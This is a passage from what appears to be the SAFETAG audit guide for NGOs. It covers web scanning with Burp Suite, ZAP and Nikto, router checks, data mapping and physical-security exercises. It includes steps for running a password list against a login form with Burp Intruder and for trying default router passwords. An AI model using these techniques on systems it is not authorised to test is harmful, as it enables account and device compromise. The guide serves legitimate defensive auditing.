• Now under Intruder > number tab > Target uncheck "Use HTTPs".
• Now click under Intruder > number tab > Position to view all replaceble variables.
• Try looking for email and pass,
  • You can either change your variable for email and pass for earch or just include ONE variable. For this exercise, we will use the pass variable.
• Now under Intruder > Payloads
  • You can define here the number of payload sets depdening on your attack type (for our case, since we only have 1, let's use 1)
• Now below the options Payload Sets, you can see Payload Options where you can add, Paste, add from list strings that you can use as your payload.
• After typing your list of strings or passwords, let's go to Positions tab, and on the right side of Payload Options click Start Attack
• After clicking "Start Attack" it will open a window of results usually your HTTP responses codes.

Take note of these errors to see how the target web application respond when given certain types of strings.

Setting up your environment

Selecting a Project

Selecting a Configuration

Opening a Project From a Different Burp Installation

Display Settings

The Basics of Using Burp ___

OWASP ZAP (Active)

OWASP ZAP allows an auditor to quickly identify common web vulnerabilities using the OWASP framework - either by a relatively intense spidering of the website or through a more tailored use of the proxy functionality of the tool.

OWASP ZAP provides a highly configurable tool to test for common website vulnerabilities. In addition to supporting organizational change to support general best practices for websites, OWASP can expose more specific vulnerabilties that may warrant action above and beyond general best practice work.

For a website that can be expected to withstand a dedicated spidering of its content, the automated mode will dig through and expose common vulnerabilities. The tool itself is relatively easy to use.

For more delicate sites, private sites, or other situations, OWASP can also proxy your web browser and test the pages you click through.

Quick Guide Setting up OWASP Zaproxy Scanner:

1. Download the latest version of Zaproxy from: https://github.com/zaproxy/zaproxy/wiki/Downloads

2. After installation, you will be brought into the OWASP Zaproxy's Session management page.
   • Yes, I want to persist this session with name based on the current timestamp
   • Yes, I want to persist this session but I want to specify the name and location
   • No, I don't want to persist this session at this moment in time
   • Remember my choice and do not ask me again

Note: By default, ZAP sessions are always recorded to disk in a HSQLDB database with a default name and location. If you do not persist the session, those files are deleted when you exit ZAP.

ZAP User Interface:

The ZAP user interface consist of the following options:

Running Assessment:

Before you can run your assessment in ZAP, you need to configure your browser first to use ZAP as it's proxy. By default, ZAP uses:

Address: localhost Port: 8080

Note: Remember that Burpsuite also uses the same Address and port no. Be reminded to close any of which application that you are not using.

Since that ZAP is acting as a proxy between your browser and the web application, the use of SSL(HTTPS) may cause the certificate validation to fail and the connection be terminated. This happen because ZAP encrypts and decrypts traffic sent to the web application using the original web applications certificate. This is done so ZAP can access the plaintext in the request and the response.

To prevent this, ZAP creates an SSL cert automatically for each host you access, and signed by ZAP's CA certificate. To setup your browser to trust these SSL certs, you need to import and trust the ZAP root CA certificate. Once it's done, the other ZAP certificates signed by it will be trusted as well.

Keep the self-generated Root CA certificate to avoid creating a vulnerability.

1. Start ZAP and click Tools -> Options.
2. On the left pane of the Options window, click Dynamic SSL Certificates.
3. On the right pane, click Save.
4. Select a location to save the certificate to and click Save. Be sure to retain the .cer file extension.

To install the ZAP Root CA certificate as trusted root certificate for Windows/Chrome:

1. Browse to the certificate file location.
2. Right-click on the certificate file and then click Install Certificate.
3. In the Certificate Import Wizard, select either Current User or Local Machine as the scope of the certificate, then click Next.
4. Select Place all certificates in the following store.
5. Click Browse and select Trusted Root Certificate Authorities or Trusted Root Certificates (depending on your version of Windows) as the certificate store, then click Next.
6. Click Finish.
7. Review the security warning about trusted root certificates and click Yes if the warning is accepted.

To verify that the ZAP Root CA certificate is installed:

1. Open Control Panel and click Internet Options.
2. On the Content tab, in the Certificates section, click Certificates.
3. On the Trusted Root Certificates tab, verify that the OWASP ZAP Root CA certificate is listed.

If you are testing using Firefox, you need to install the ZAP Root CA certificate a second time into Firefox’s own certificate store.

To install the ZAP Root CA for Mozilla Firefox:

1. Start Firefox and click Preferences.
2. On the Advanced tab, click the Encryption tab.
3. Click View Certificates.
4. On the Trusted root certificates tab, click Import and select the ZAP Root CA file you saved previously.
5. In the Import wizard, select Trust this CA to identify web sites.
6. Click OK.

Additional OWASP ZAP references:

• Wiki and QuickStart Guide
• Overall walkthrough
• [Testing with Metasploitable VM](http://cyberarms.wordpress.com/2014/06/05/quick-and-easy-website-vulnerability-scans-with-owasp-zap/ (see also https://www.owasp.org/index.php/Webgoat and http://sourceforge.net/projects/samurai)
• Walkthrough of automated mode
• Walkthrough of proxy usage

Nikto Web Scanner (Active)

Introduction

Nikto is a tool that comes with Kali Linux. It's an easy tool to use in performing web vulnerability scan. According to Nikto's main page:

"Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated"

In your Kali Linux you can use Nikto by:

1. Go to Applications > Web Application Analysis > Web Vulnerability Scanners > Nikto

2. Go to Applications > System > Root Terminal

Using Nikto to Scan Web Application

0. File Upload
1. Interesting File / Seen in logs
2. Misconfiguration / Default File
3. Information Disclosure
4. Injection (XSS/Script/HTML)
5. Remote File Retrieval - Inside Web Root
6. Denial of Service
7. Remote File Retrieval - Server Wide
8. Command Execution / Remote Shell
9. SQL Injection

1. Authentication Bypass
2. Software Identification
3. Remote Source Inclusion
4. Reverse Tuning Options (i.e., include all except specified)

Recommendation

Check Config Files

Summary

Examine configuration files for vulnerabilities using "hardening", or "common mistake" guides found online.

Overview

• Explore default configurations.
  • Identify if systems are using default passwords or users
• Use hardening guides & common min-configurations to identify weak/vulnerable configurations.

Materials Needed

Considerations

Walkthrough

Recommendation

Network Vulnerabilities

See the Network Access and Mapping activities for methods to expose insecure wireless networks and for methods to use network mapping and traffic analysis to discover further potential vulnerabilities or points to investigate.

Router Based Attacks

Summary

Many wireless routers still use the default password listed in “Router Default Password Search”, meaning that anyone with access to the network could also take complete control of the router - adding in remote access tools or setting up other attacks.

Overview

• Find the router(s) (route works well for this)
• Test using default passwords
• Check for upgrades / un-patched vulnerabilities and backdoors
• Investigate potentially valuable data (logs, connected users)

Materials Needed

Considerations

Walkthrough

Material that may be Useful:

• Search Engine: “Router Default Password Search” (RouterPasswords.com)

• Framework: “Router Exploitation Framwork”

Recommendation

Change Default Router Passwords

Passwords - particularly on core network devices - is very important. Use a password manager to save the new password (or be prepared to reset the router to a factory default).

While nominally "inside the firewall" and protected from remote attacks, leaving routers with default passwords, particularly wireless routers whose networks are often shared with visitors, is a potentially very high risk for an organization. Anyone who has gained access to the network via legitimate or other means could subtly alter the router's configuration to provide remote access, or route traffic to an attacker-designated server. Such changes can easily go undetected for long periods of time.

Sensitive Data

Summary

Data and meta-data about an organization and its staff is incredibly difficult to keep track of over time, as people or projects use cloud services like Dropbox or Google Drive for some activities, a shared server for others, and a mix of work and personal devices (laptops, phones, tablets...).

This is natural, but it is important to keep track of where your organization's data lives and who can access it.

Overview

• With staff input, post up popular places where data is kept (laptops, email, shared drives...)
• Using stickies, gather from the staff what data is kept in what locations - duplicating notes when needed
• Rank data by sensitivity
• Discuss the impact of one of the devices where data is stored being lost - are there backups?
• Discuss the impact of a device being exposed / taken by an adversary
• Identify who has access (physical access, login access, and permissions), and who needs to have access to get the organizations work completed.

Materials Needed

• Stickies and markers for activities
• Flip chart paper or a whiteboard
• Camera to record outputs digitally

Considerations

• Some of the stickies generated in this activity may provide sensitive data, dispose of them responsibly.
• If you take photos for reporting needs, save the image files in a secure, encrypted container.

Walkthrough

Sensitive Data Assessment Activity

Duration: 45 minutes

This exercise is adapted from the LevelUp Activity, Backup Matrix, part of the curricula for Data Retrention and Backup by Daniel O'Clunaigh, Ali Ravi, Samir Nassar, and Carol.

Materials to Prepare:

• Stickies
• Markers
• Flipchart paper
• One larger sheet of paper taped to wall in landscape orientation, with or without prepared titles. (For an example with prepared headings, see the matrix below.) The Sensitivity axis is optional in the original exercise, but critical for this one. It can be added after the initial round of brainstorming however to streamline the flow.

Explain to participants that we're going to conduct an information mapping activity to get a sense of where our important information actually is.

Start by listing the different places where our information is stored, according to participants. If no suggestions are forthcoming, we can prompt participants with the obvious stuff:

• Computer hard drives
• USB flash drives
• External hard drives
• Cellphones
• CDs & DVDs (and BDs)
• Our email inbox
• The Cloud: Dropbox, Google Drive, SkyDrive, etc
• Physical copies (or “hard copies”) in the office
• Multimedia: Video tapes, audio recordings, photographs, etc.

Use large stickies to place these as column headers on a wall. More will come up later in the course of the exercise.

Elicit from participants what type of information or data they have in each of these places. For example:

• Email
• Contact details, such as a member database
• Reports/research
• Funder information / contracts
• Accounts/spreadsheets
• Videos
• Images
• Private messages on Facebook, etc.

To encourage participant interaction, write one example on a sticky and place it in the appropriate box in the matrix. Then, ask whether there is another copy of this data somewhere. If there is, you can use another sticky and put it wherever they keep the duplicate.

TIP: Place Computers, Phones, and Email next to each other, so you won't have to create duplicates for everything "stored" in email (and therefore on laptops and phones)

Introduce a new vertical axis representing sensitivity. The higher on the chart, the more sensitive the data. Ask the participants to rank data.

For a large group, divide the group into smaller teams for the next steps (it helps if there are relatively clear thematic distinctions within the group, such as nationality, type of work, area of interest, etc.)

Provide stickies to the group(s). Have the group(s) brainstorm about all of the data they work with, focusing on the most important data first.

Participants should write ONE type per sticky, and create duplicates if the data is stored in multiple locations.

For a small group, this can be done as a "live" brainstorm. For larger groups that have been subdivided, have each group finish listing out their most important data and then have each group place the stickies on the matrix. Invite discussions around the sensitivity of the data.

An example may look something like this:

Explain that this gives us an idea of where our data is. Elicit whether or not this is all the data we generate? Of course it isn't: It's only a small percentage.

The LevelUp lesson uses this primarily to discuss the importance of backups, and this is a valuable point to make.

Call out the information that they are keeping on their computer's hard drive (which will usually be the fullest one). Elicit some of the things that can cause a computer to stop working. Maybe take a show of hands: Who has had this happen to them?

• Virus or malware attack destroyed a computer or some data
• Stolen computer, confiscated computer
• Infrastructural problems, like a power failure broke a computer
• Inexplicably bricked computer, etc.

For SAFETAG, we focus on the "Sensitive data in the wrong hands" section. Based on the clustering of sensitive data along the vertical access, choose a column that has an unsual amount of sensitive data (email or computers, usually).

Remove the stickies from the column but keep them in your hand and read them. Now I have this information. What can I do with it? And what are you left with? Is anyone at risk - yourselves? partners? If this were published on the Internet, what would happen?

Recommendation

Risks of Data Lost and Found

Summary

Have staff rank the impact if different data within the organization was lost, and the impact if various adversaries gained access to that data.

Overview

Materials Needed

Considerations

Walkthrough

See the Sensitive Data activity for an interactive way to gather the types of data in the organization for this ranking exercise.

Recommendation

Private Data

Summary

Guide staff through an activity to have them list private data within the organization (e.g. Using the "personal information to keep private" handout. ⁷⁶)

Overview

Materials Needed

Considerations

Walkthrough

Personal Information To Keep Private

Information that can be used to identify individuals, organizations, and even communities of practice should be treated with the utmost care. Some data, like names, phone numbers, and addresses are obvious, while others, like computer names, the MAC addresses of wifi cards, or pseudonymous social media accounts may be less obvious. Also, combinations of information - location, data, and type of activity, or even an issue area of interest and a city name may specify a very small number of activists or organizations.

This spreadsheet, part of the Responsible Data Forum documentation sprint provides a useful baseline of types of data and ways to manage or obfsucate it usefully: Data Anonymization Checklist

Recommendation

For the internal audit report back to the organization, much of the information will require specific identification of user devices (and by extension, their users), as well as very sensitive organizational data. None of this data, by intention, accident, or adversarial action, should be shared with third parties.

Please refer to the Analysis and Reporting section for the limited data set that is required for project reporting, and to the Operational Security section for guidance on data security.

Assessing Usage of Cloud Services

Summary

During the organizational assessment you will almost certainly come across 3rd party cloud-based service providers being used by the audited organization. The organization may be interested in your assessment of the security of those services. This poses several challenges to you as an auditor:

* auditing 3rd party web applications almost certainly falls outside of the scope of the audit engagement
* you likely do not have an agreement with the service provider to scan their application
* a proper assessment would take more time than is available for the organizational audit
* you may not be familiar with the service or technology it is built on

Despite these challenges, significant organizational processes and sensitive data may reside on or rely upon those 3rd party applications. It can be important to the audit to provide some preliminary investigation and risk assessment into the usage of any 3rd party cloud services they rely upon.

Overview

• Review organization's use of cloud services (which services, what data, access policies)
• Review formal policies of cloud services in use
• Search for historical security problems with each provider and their response to it.

Materials Needed

Considerations

• Auditing 3rd party services must be negotiated directly with the service provider and adds significant complexity to the process (and would normally fall out of scope). There are often serious legal issues involved in auditing outside of a formal, signed agreement.

Walkthrough

It is increasingly difficult to run complex organizations without some reliance on cloud-based service providers such as email hosting, web hosting, or document management/backup. Organizations (and as assisted by the auditor) should review their options in the selection of cloud providers, and in parallel consider ways to apply practices and policies to their use to meet organizational security requirements.

Cloud Service Provider Review

• In conjunction with Data Mapping, review what data is stored in which cloud service(s), and who (organizationally) has access to that data.
• Map out what data and/or metadata the provider has access to
• Review the posted Terms of Service and Privacy Policies
• Review the transparency report of the provider and what jurisdictions it operates in. Are there local data storage laws in effect?
• Does the provider have account protection services meeting the requirements of the organization (e.g. 2FA)
• Search for security breaches impacting the service, and review their response (See https://haveibeenpwned.com/PwnedWebsites). Note that a breach itself is not cause to not use a service, but revelations on what was breached and how quickly, transparently, and effectively the provider responded should impact decisions.
• Where relevant, review any security/product whitepapers posted on their service and implementation.
• Look for any records (and/or request from the company) information about audits of their systems/code

Internal/Organizational Considerations

• Back-up and availability - One of the major risks with an external service is that they will go out of business and/or the data might become inaccessible due to factors outside of the organization's control. Does the provider have guarantees in terms of availability here, and/or what practices can the organization leverage to have additional backup/export options.
• Is the organization implementing the best practices put in place by the company offering the service? E.g login processes - 2FA..
• What are the password management practices for the cloud/web based services? Account credentials - who opened the accounts and how they are accessible in their absence?
• How are logins to the service managed when employees leave or when temporary access is required for a contractor or partner?

Recommendation

Schedule regular (annual?) reviews of the external services to ensure that they meet organizational requirements for functionality and security, business solvency, and exporting or transferring of data.

When considering formalizing the use of new 3rd party services, review the questions and processes here to help guide the decision.

Guided Tour

Summary

During this component an auditor tours the audit location(s) and flags potential risks related to physical access at that location.

Overview

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

• Networking equipment and servers
• User devices (workstations/laptops, smarthpones, USB drives)
• Sensitive information or external storage drives lying on desks
• Accounts/passwords written on post-its, white-boards, etc.
• Unattended, logged in computers
• Unlocked cabinets, computer rooms, or wiring closets
• Network ports that are not in use, especially ones not in plain sight

This can be done remotely via secure videoconference over a smartphone or tablet that can moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Materials Needed

• A camera and/or notepad may be useful
• For remote support, a secure and portable videochat system (such as Signal) which works with the available bandwidth.

Considerations

• Any physical notes taken on physical security should be destroyed. Digital notes should be kept in line with overall SAFETAG standards.
• Any remote communication on physical security should be done over secured channels from a private space
• It should be noted that SAFETAG is focused only on the digital impacts of physical security. This guide does not provide a full physical security assessment.

Walkthrough

As part of your first day, have your point of contact walk you around the office - this is primarily a chance to understand the office layout and meet the rest of the staff, but take mental note of the devices in use and laying out on desks as you walk around the office. Note as well the location and access to components such as servers and networking components. Taking actual notes may make the staff feel that you are judging them, especially if this is your first interaction -- refrain from this, and if needed, also consider a more "neutral" note-taking process by integrating the Office Mapping activity.

If the auditor is unable to go to the office (or can only visit one of multiple offices), consider having the point of contact use a video call. You will want to have the entire staff be aware of this activity and know the person who is walking around the office. This requires sufficient bandwidth (and unmetered or low-cost) for a 1-hour video call. This could be scheduled for before or after office hours to both discover how devices are left overnight as well as reducing the impact on the network.

Similarly, the in-person tour can also be done outside of normal business hours. Please note: this can damage the trust the staff has in the auditor, as well as unintentionally embarrassing specific staff members in the eyes of the point of contact. It is not recommended to do this except for organizations who have already received training and worked on improving their physical/operational security practices and face an active adversary. This could be before the staff arrives in the morning, during lunch, or after hours (perhaps have dinner with your point of contact, and come back to check the organization afterwards). This gives a clearer picture of how devices are secured outside of the work day (are desktops and laptops unsecured, still on, logged in?). Are backup drives or other storage media easily accessible? Are doors to server rooms/closets locked? Are keys to these locked cabinets/rooms visible?

Materials that may be useful

Recommendation

Office Equipment is unsecured against burglary

Unsecured physical network components and devices such as computers, servers, and external drives present a risk of sensitive data loss through theft, seizure, and malicious interference. Access to network compontents and servers should be limited and devices should be secured when not in use.

In the event of a burglary or office raid, an attacker could easily obtain sensitive information from devices without encryption, external hard drives, and other easily accessible items. An advanced attacker could compromise the network for later surveillance.

Secure Devices

Lock in desks or via security cables all easily portable items

Any device which connects to the organization's digital assets (and therefore has passwords or cached data) or stores organizational data (including backup drives, laptops, desktops, cameras, other storage media), should be secured (ideally out of sight, such as in a locked cabinet or desk drawer) when not in use to prevent theft and discourage seizure.

Follow the Device Assessment guidelines on drive encryption.

Encrypted drives offer the best protection against data loss from stolen or seized devices. Follow the recommendations of the Device Assessment section, paying specific attention to the need for strong passwords, automatic locking of logged-in accounts, and the importance of turning a machine off to fully benefit from drive encryption.

Place core network components and servers in a locked space.

Direct access to servers and network components such as routers, cablemodems, patch panels and switches provides an adversary multiple ways to extract sensitive information and cause extensive, yet hard to detect, damage. Ensuring that not only are these physically protected, but that there are organizational policies around which staff have access to them is critical - a locked cabinet that always has the key in the lock does not provide security. If a particular component needs, for example, regular rebooting, creative solutions should be found to balance security and staff needs.

De-activate unused network ports

Hard-wired network ports tend to connect directly into the most trusted parts of a network. De-activating any that are in public areas of the office (front desk, conference rooms, break rooms), as well as any that are not needed is recommended.

Operational Security Survey

Summary

This activity helps the auditor assess the organization's current operational security policies and practices through in-person or remote surveys and/or interviews. By also requesting to review and official policies as well as conducting multiple iterations of this with different staff members, some basic verification of the practices and awareness/understanding of existing policies can be achieved

Overview

The auditor interviews and/or requests survey input from organizational representatives, requests supporting documentation (e.g. policies) as relevant, and iterates/repeats as needed.

This activity is used to solidify the auditor's understanding of the physical risks the organization faces in its work as they impact information security:

• Discuss potential risks and history
• Explore the physical office setup
• Determine access controls and related policies (who has access to what, when?)
• Determine where and when staff members work (office, cafe, co-working spaces, home, on travel/remote assignments)

This can be done entirely remotely over secure communications channels (see operational security considerations), and may be useful to be done partially or fully in advance of an in-person audit to further understand operational risks of traveling to the office location.

Materials Needed

• (optional) Survey system with appropriate security precautions and access controls
• Note-taking device that can be secured.
• For remote support, a secure videochat system (such as Signal) which works with the available bandwidth.

Considerations

• Any physical notes taken on physical security should be destroyed. Digital notes should be kept in line with overall SAFETAG standards.
• Consider the threat context if an online survey tool is used to collect information and manage data access and storage responsibly.
• Any remote communication on physical security should be done over secured channels from a private space
• It should be noted that SAFETAG is focused only on the digital impacts of physical security. This guide does not provide a full physical security assessment.

Walkthrough

This activity should build on the preparation work of the auditor, as well as the capacity assessment and context research work:

• Capacity Assessment: If the auditor has already completed the Capacity Assessment interview, many of the answers from its introductory "Open Up" questions (5-22) provide threat history, likelihood, and some basic policy information, and the questions grouped as "Threat Information," (58-68) go deeper into previous problems and responses. If those were not asked, they can be included here as a follow-up interview/survey.
• Context Research: Ensure context research has revealed whether the organization would be targeted by adversaries due to their work (e.g. advocacy, engagement in or media coverage of socially sensitive topics, etc.). Threat identification and technical context research should provide insight into likely technical capabilities of adversaries (are malware or other surillance tools used (https://sii.transparencytoolkit.org/) ? Physical surveillance/monitoring? Keyloggers?)

Once an initial interview or survey has taken place (as part of capacity assessment or dedicated to the above-mentioned questions), Send a follow-up request for any policies mentioned or referred to (travel policies, onboarding/offboarding policies for staff changes, personal device usage ("BYOD") policies, etc.). After reviewing those documents, request any additional policies those may refer to (general IT or security policies), and/or schedule a follow up interview or informal survey to dig deeper into remaining unanswered questions on the operatioal security situation of the organization as well as their adaptations to it. In the (likely) case where there are no policies governing these topics, the auditor can ask their points of contact for these discussions what the general practices are and expand and verify this through additional activities.

In creating new questions, be careful to not "lead" on security in a way that would discourage honest and transparent responses. For example, ask "Do you host community events and trainings?" instead of "Do you allow outside people into your office"?

Below are questions not already covered in the capacity assessment interview process, and after that selected questions from that process which are of particular use here.

Office layout and proximity concerns

Describe your office - is it on a floor of a building? An entire floor? (What level of the building?) How close are other buildings? Is it a shared, open office space or co-working space? (shared network? open access?)?

Has the organization dealt with robberies/theft, break-ins, or office raids? If so, what happened, when, and how did you respond (or do you have a policy or contingency plan? When was that last reviewed/updated?)

What other wifi networks can you see? (See https://wigle.net/ )

Physical Access Controls

Do you consider your office space to be secure?

• [ ] No
• [ ] Yes

Who has independent access to the office space, and routine after-hours access (i.e. who is able to unlock the space). This may include security, cleaning or other building service personnel.

Do you have policies and procedures for authorizing and limiting unauthorized physical access to digital systems and the facilities in which they are housed?

• [ ] No
• [ ] Yes

Describe the measures to restrict physical access to the following

• Servers (Data server, Internet server, etc)
• User workstations/laptops
• Network devices (eg routers, switches, etc)
• Printers

Do your policies and procedures specify the methods used to control physical access to your secure areas, such as door locks, access control systems, security officers, or video monitoring?

• [ ] No
• [ ] Yes

Device Controls

Do you have procedures for physically securing portable devices such as laptops and mobile phones?

• [ ] No
• [ ] Yes If yes, please highlight them

Do you have a key personnel responsible for the security of digital resources?

• [ ] No
• [ ] Yes

Do you have policies covering laptop security (e.g. cable lock or secure storage)?

• [ ] No
• [ ] Yes

Are there procedures to automatically lock digital devices if left unattended for sometime?

• [ ] No
• [ ] Yes If yes, what are the procedures?

Emergency Planning

Do you have a business continuity plan in case of serious incidents or disaster to your digital resources and is it current?

• [ ] No
• [ ] Yes If yes, please highlight the steps taken.

Does your plan identify areas and facilities that need to be sealed off immediately in case of an emergency?

• [ ] No
• [ ] Yes

Are key personnel aware of the plan and how to respond to the emergency?

• [ ] No
• [ ] Yes

Programs and staff

• Do you host events or trainings at the office? Open "cybercafe" or community meeting space?
• Do you host 1:1 meetings with funders, partners,
• Do staff work from or meet at homes or cafes/restaurants?

Selected questions from the Capacity Assessment Interview, "Open Up" section:

• What issues does the organization work on? Are these issues sensitive where you work?
• Where does your organization have activities?
• Does the organization have activities in more than one (city/provence/country/region)?
• What kind of funding does you organization receive?
• Does the organization have its own office space?
• Does the organization have a domain name or brand identity that is used for all online communications?
• Does the organization have a staff member responsible for working with digital or mobile technology?
• How regularly do staff members of the organization travel outside of your country
• Does the organization do any of the following activities when travelling internationally
• Run programs
• Participate in events
• Run trainings
• Receive trainings
• Fundraising

From "Threat Information"

• To your knowledge, how often do the below incidents occur in the geographic areas or issue areas in which your organization is active? Could you please tell me if you think they happen never, sometimes or often
  • The government lawfully intercepts information communicated by civil society or private person
  • The government lawfully confiscates equipment because of the information it contains
  • Government, public officials, non-state actors, police or security forces use digital or mobile technology to identify and target individuals for arrest or violen
  • Government, public officials, non-state actors, police or security forces use digital or mobile technology to attack the reputations of individuals or organizations
• To your knowledge, how often do the below actors use digital or mobile technolog to target or to identify individuals for arrest or violence? Do they use it never, sometimes, or often?
  • government or public officials
  • non-state actors (corporations, social groups)
  • police, security forces or paramilitary groups
• And how often would you say that these actors use digital or mobile technology to monitor or gather information on civil society activities? Never, sometimes, or often.
  • government or public officials
  • non-state actors (corporations, social groups)
  • police, security forces or paramilitary groups
• What do you feel are the most immediate and serious digital threats to the organization?
• How much risk do you feel each of these digital threats presents to your organization?
  • Online surveillance
  • DDOS (Distributed Denial of Service) Attack
  • Targeted for physical violence on the basis of digital activity
  • Data loss
  • Other.
• Do you feel that any of these threats place the physical security of your staff in danger?
• Do you feel that any of these threats place the physical security of your stakeholders in danger?
• Do you feel that any of these threats place the physical security of your beneficiaries in danger?
• In the last six months, have you or any of your civil society peers experienced any of the following?
  • Intimidation or threats of violence by public officials, police or security force
  • Intimidation or threats of violence by private or non-state actors.
  • Threats of arrest or detention
  • Arrest
  • Threats of Torture.
  • Confiscation of equipment
  • Threats to administrative standing, such as stripping individuals of professional accreditation or organization of licenses
  • Other
• How has your organization responded to these threats?
  • Addressed the issue in the press/online
  • Told other organizations about the threat
  • Contacted the authorities
  • Trained staff to prevent and mitigate such threats in the future
  • Requested help from other organizations
  • Invested in hardware
  • raised funds
  • has not responded
  • other
• Has the organization taken any of the following steps to prepare against digital or physical threats?
  • Staff have been trained
  • There are specific plans in place for specific situations
  • Equiptment and/or supplies have been made ready
  • Other

From the Technical Only section:

• Are Disaster Recovery Procedures in place for the application data?
• Are Change Management procedures in place?
• What is the mean time to repair systems outages?
• Is any system monitoring software in place?
• What are the most critical servers and applications?
• Do you use backups in your organization?
• Are there any data/devices that are not backed up?
• Are backups tested on a regular basis?
• When was the last time the backups were restored?

Recommendation

See recommendation section in the Guided Tour activity.

For useful organizational policy recommendations, review the SANS Information Security Policy Templates

Office Mapping

Summary

This activity seeks to identify potential physical vulnerabilities to an organization's information security practices by documenting the current physical layout of the office and the locations of key assets, as well as potential "external" risks such as nearby/shared office spaces.

This can be done in person independently or alongside the "Guided Tour" activity, and can also be done in advance of an assessment or remotely by a willing staff member who knows where these assets are located (often a technical or administrative staff person). This can also be conducted in a multi-office or home-office environment where the auditor is unable to visit every location.

Overview

In this activity, the auditor or the organization draws a map of the office space and notes locations of potentially valuable information or assets.

This activity can be paired with the Guided Tour activity, to reduce the awkwardness of taking notes while walking around the office during the Tour, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each. This can also be done by an organizational point of contact in advance to provide additional preparation for the auditor.

Materials Needed

• Notepad and/or simple drawing or floorplan software
• A willing participant (auditor, staff member) who is known to the staff able to walk around and map the office.
• A camera (see operational security considerations)

Considerations

• Any physical notes taken on physical security should be destroyed. Digital notes should be kept in line with overall SAFETAG standards.
• The location of certain high-value assets is highly sensitive, and may be controlled/secret information. Handle with care when discussing with the organization, and if conducting this remotely/in advance, ensure the point of contact can handle and destroy the data responsibly.
• If using drawing software, note that using free online tools could easily leave sensitive data exposed. Offline tools such as LibreOffice Draw, Pencil, or even Microsoft Powerpoint or Visio all work, but the product should be securely managed.
• Any photos taken (of the map drawing or specific office areas/rooms) should be securely deleted or taken using a secure camera app such as ObscuraCam
• It should be noted that SAFETAG is focused only on the digital impacts of physical security. This guide does not provide a full physical security assessment.

Walkthrough

Walk around the office and draw a map of the floor-plan (do not rely upon memory). Consider taking photos of specific areas (e.g. confusing layouts or areas difficult to capture in drawing). Make notes of where intruders could gain access to the office, where sensitive data may live (in the executive director's desk, in a storage closet, on devices), and relevant other items. Also note the overall privacy that the office provides (is it a shared office space, shared building, etc.)

Note the locations of any of the following that apply:

• Office rooms and storage:
• Meeting rooms
• Staff offices/desks
• Paper File Storage, such as human resources and financial records storage
• Closets
• Safe room
• Main entry to office
• Additional Entry/Exit doors
• Windows accessible to the outside (terraces, ground floor, etc.)
• Fire escapes

• Basement/Roof access

• People (staffing varies widely, adapt as relevant)
• Executive Director
• Other directors
• Financial lead
• Human resources lead
• Team leads
• Office admin
• IT staff

• Additional staff

• Infrastucture and Devices:
• Fuse box / electricity mains
• Cable/DSL modem
• Router / network switch
• wifi access points and "repeaters"
• printers/scanners
• Paper shredder
• Servers (fileserver, email, backup, etc.) and/or desktop/tower computers (which never leave the office)

• Digital backups (tape drives, hard drives, "time machines" etc.)

If doing this activity remotely and/or in advance of an audit, it may be useful to have multiple staff members independently draw maps and to provide the organization with additional guiding questions:

• If you were playing hide and seek, where would be the best place to go? how they enter /exit, whwere they store stuff (clkosets, etc.)
• What is nearby the office? Is it in a shared/open/co-working space? Is it in an office building? A home? An apartment? What floor of the building is the office on? What else is nearby (other offices? Residential buildings, restaurants/cafes)?
• If you discovered your office had been broken in to, what would your first guess of where or how the burglar broke in be?

Recommendation

See recommendation section in the Guided Tour activity.

Scavenger Hunt

Summary

This activity assists in identifying potential physical security concerns at an organization, particularly when an auditor cannot travel to the office location or cannot visit every office location. The scavenger hunt approach is focused on involving the organization staff members into mapping out potential threats based on the abstraction and the gamification of the physical security mapping process. See the "Risk Hunting" exercise in SaferJourno, page 19, for additional ideas and guidance on conducting this activity.

Overview

A local facilitator is required to lead this "scavenger hunt" where staff members seek out potential physical security challenges themselves. This activity should only be conducted within an environment with a high level of trust and consent. The auditor should get the agreement from the host NGO to involve all staff members into the exercise to avoid causing trust issues. By involving the staff members in identifying physical security risks, you are also taking a step forward to increase awareness on these issues.

With facilitation, staff members will explore their own office looking for potential physical security risks and share results. To reduce the risk of individual staff embarrassment, they will first review their own working space and secure it before looking around other parts of the office. The facilitator, in consultation with the auditor and the organizational point of contact may declare some areas "off limits"

Materials Needed

• (Optional) Mobile phone cameras (see operational security considerations)
• Notepad + Pen for each staff member
• Printout of example security risks
• Encrypted file sharing platform (Signal)

Considerations

• Reset credentials found during the process.
• Any photos taken (of the map drawing or specific office areas/rooms) should be securely deleted or taken using a secure camera app such as ObscuraCam. Photos of keys in particular can be used to duplicate a key. The instructions below simply use notepads to track concerns, reducing this risk but possibly being less impactful.
• Any physical notes taken on physical security should be destroyed. Digital notes should be kept in line with overall SAFETAG standards.
• The location of certain high-value assets is highly sensitive, and may be controlled/secret information. Handle with care when discussing with the organization, and if conducting this remotely/in advance, ensure the point of contact can handle and destroy the data responsibly.
• It should be noted that SAFETAG is focused only on the digital impacts of physical security. This guide does not provide a full physical security assessment.

Walkthrough

The auditor should first meet with the facilitator (possibly over secure videochat) to brief them on the activity and map out potential challenges (particularly around trust, organizational hierarchies, and any potential repercussions).

The auditor then prepares a checklist of physical vulnerabilities with the facilitator, based on the current understanding of the organization's assets and the context they are operating within. The auditor, facilitator, and organization point of contact should decide if any areas are "off limits." Note that this is only a list of a suggestions. As with the "Risk Hunting" exercise in SaferJourno, and it should be modified to fit the requirements, assets, and threats the organization faces:

• Open windows.
• Door with key hanging from the lock and/or unlocked doors to secure areas
• Unlocked access to networking equipment - routers, wifi, modem / cablemodem / servers
• Unsecured Laptop(s) (e.g. no locked cabinet for overnight storage, no cable lock)
• Computer left unattended with active Outlook, Gmail, Skype or other communication application open and visible.
• Wires or cables for devices that have been strewn on the floor where someone would need to step over them.
• Portable backup drives, USBs, and/or other external hard drives on desktops or plugged in to computers
• Passwords written on a “sticky note” or other paper taped to a monitor or onto the surface of a desk.
• Smartphones, cameras or other valuable devices left unattended

